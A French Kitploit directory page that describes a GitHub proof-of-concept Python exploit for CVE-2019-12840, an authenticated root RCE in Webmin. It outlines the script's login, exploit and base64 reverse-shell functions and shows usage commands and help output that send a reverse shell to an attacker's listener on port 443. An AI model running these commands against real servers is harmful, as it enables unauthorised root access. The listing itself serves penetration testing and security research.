Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
PoC-CVE-2019-12840 — Ceci est une preuve de concept personnelle et basique de la vulnérabilité CVE-2019-12840 qui vous donne un RCE en root | Kitploit
Outils/GitHubGitHub/pol-ruiz/poc-cve-2019-12840
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionOutil d'Accès à Distance
GitHubpol-ruiz/poc-cve-2019-12840

PoC-CVE-2019-12840

Ceci est une preuve de concept personnelle et basique de la vulnérabilité CVE-2019-12840 qui vous donne un RCE en root

Voir le dépôt
1il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Exploit pour CVE-2019-12840 dans Webmin

Ce dépôt contient un script Python qui exploite la vulnérabilité CVE-2019-12840 dans Webmin.

Description

Le script tente de se connecter à un serveur Webmin, puis d'exploiter la vulnérabilité CVE-2019-12840. Le script accepte plusieurs arguments en ligne de commande, notamment le nom d'utilisateur et le mot de passe pour se connecter au serveur Webmin, l'URL du serveur, le port du serveur, le port local pour le shell inversé, et une commande à exécuter sur le serveur.

Utilisation

Pour utiliser ce script, vous devez fournir au moins le nom d'utilisateur, le mot de passe et l'URL du serveur Webmin. Voici un exemple d'utilisation du script :

python exploit.py -U username -P password -u http://localhost:10000 -lhost 10.x.x.x -lport 443

Description du code

Le script Python dans ce dépôt est structuré comme suit :

  1. Importation de modules : Le script commence par importer plusieurs modules Python nécessaires à son fonctionnement. Ceux-ci incluent requests pour faire des requêtes HTTP, argparse pour gérer les arguments de ligne de commande, base64 pour l'encodage et le décodage en base64, et BeautifulSoup pour analyser le HTML.

  2. Définition de fonctions : Le script définit plusieurs fonctions :

  • : Cette fonction effectue une requête POST vers une URL spécifique avec une charge utile spécifique et vérifie la réponse.
CVE_2019_12840(url,auth_base64,cmd)
  • login(username,password,url) : Cette fonction tente de se connecter au serveur Webmin avec un nom d'utilisateur et un mot de passe fournis.
  • exploit(sid,url,cmd) : Cette fonction tente d'exploiter la vulnérabilité CVE-2019-12840 sur le serveur Webmin.
  • b64revshell(lhost,lport) : Cette fonction génère un shell inversé encodé en base64.
    1. Gestion des arguments de ligne de commande : Le script accepte plusieurs arguments de ligne de commande, notamment le nom d'utilisateur et le mot de passe pour se connecter au serveur Webmin, l'URL du serveur, le port du serveur, le port local pour le shell inversé, et une commande à exécuter sur le serveur.

    2. Exécution de l'exploit : Si le script est exécuté comme un programme indépendant (plutôt que d'être importé comme un module), il tentera de se connecter au serveur Webmin, puis exécutera l'exploit.

    Aide du programme

    Le script accepte plusieurs arguments en ligne de commande. Voici un exemple d'utilisation du script :

    python3 CVE-2019-12840.py -h

    Cela affichera l'aide du programme, qui inclut ce qui suit :

    root@kitploit:~
      _______      ________    ___   ___  __  ___        __ ___   ___  _  _    ___                                      
     / ____\ \    / /  ____|  |__ \ / _ \/_ |/ _ \      /_ |__ \ / _ \| || |  / _ \                                     
    | |     \ \  / /| |__ ______ ) | | | || | (_) |______| |  ) | (_) | || |_| | | |                                    
    | |      \ \/ / |  __|______/ /| | | || |\__, |______| | / / > _ <|__   _| | | |                                    
    | |____   \  /  | |____    / /_| |_| || |  / /       | |/ /_| (_) |  | | | |_| |                                    
     \_____|   \/   |______|  |____|\___/ |_| /_/        |_|____|\___/   |_|  \___/                                     
                                                                                                                        
                               by CyberMonkey                                                                              
                                                                                                                        
                 Webmin <= 1.910 RCE (Authorization Required)                                                           
                                                                                                                        
    usage: python CVE-2019-12840.py -u https://10.10.10.10 -U matt -P Secret123 -c "id"                                 
    usage: python CVE-2019-12840.py -u https://10.10.10.10 -U matt -P Secret123 -lhost <LOCAL_IP> -lport 443            
                                                                                                                        
                                                                                                                        
    usage: CVE-2019-12840.py [-h] -U USERNAME -P PASSWORD -u URL [-p PORT] [-lport LPORT] (-c CMD | -lhost LHOST)
    
    options:
      -h, --help    show this help message and exit
      -U USERNAME   username
      -P PASSWORD   password
      -u URL        target url
      -p PORT       target port
      -lport LPORT  local port for reverse shell
      -c CMD        command to execute
      -lhost LHOST  Send back a reverse shell at port 443
    

    Avertissement

    Ce script est un exploit de sécurité et ne doit être utilisé qu'à des fins légitimes, telles que des tests d'intrusion ou des recherches en sécurité. Il ne doit pas être utilisé pour des activités illégales. De plus, ce script est conçu pour être utilisé avec des serveurs Webmin vulnérables à la CVE-2019-12840, il peut donc ne pas fonctionner avec toutes les versions de Webmin.

    Télécharger l’outil